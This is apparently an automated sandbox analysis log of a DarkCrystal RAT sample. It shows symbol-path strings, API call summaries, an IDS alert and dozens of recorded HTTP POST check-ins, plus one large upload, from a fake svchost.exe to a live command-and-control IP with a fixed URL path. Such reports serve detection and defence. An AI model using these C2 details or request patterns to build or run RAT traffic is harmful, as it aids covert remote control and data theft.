Source:	Binary string: lC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \|C:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: jC:/Users/user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: oC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_002EA69B
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_002FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_002FC220
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe	Code function: 0_2_0030B348 FindFirstFileExA,	0_2_0030B348

Source: C:\comref\svchost.exe	Code function: 4x nop then jmp 00007FFAAB792656h		14_2_00007FFAAB78086A
Source: C:\comref\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh		14_2_00007FFAAB93D4FD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49708 -> 185.106.93.197:80

System process connects to network (likely due to code injection or exploit)

Source: C:\comref\svchost.exe

Network Connect: 185.106.93.197 80

Jump to behavior

Source: Joe Sandbox View

ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU

Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1828Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1840Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: multipart/form-data; boundary=----3L6dFNpHggmEVePS1rn0L5vFbP6ztukNDZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 108894Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
